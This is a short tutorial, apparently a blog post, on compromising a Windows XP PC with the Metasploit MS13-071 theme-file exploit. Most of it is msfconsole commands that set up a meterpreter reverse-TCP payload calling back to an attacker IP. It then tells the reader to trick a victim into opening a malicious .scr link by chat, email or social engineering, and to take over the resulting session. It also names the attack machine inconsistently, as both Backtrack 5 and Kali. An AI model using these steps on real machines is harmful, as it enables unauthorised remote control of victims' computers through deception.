Hack PC in Network Using Microsoft Windows Theme File Handling Arbitrary Code Execution
This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the “Screen Saver” tab is viewed.
Windows XP SP 3
Attacker: Backtrack 5
Victim PC: Windows XP
Open Kali Linux terminal type msfconsole
Now type use exploit/windows/fileformat/ms13_071_theme
msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_071_theme)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (ms13_071_theme)>set srvhost 192.168.1.3
msf exploit (ms13_071_theme)>exploit
Now an URL you should give to your victim \192.168.1.3:gCzJXDKtJugDsVFC.scr via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“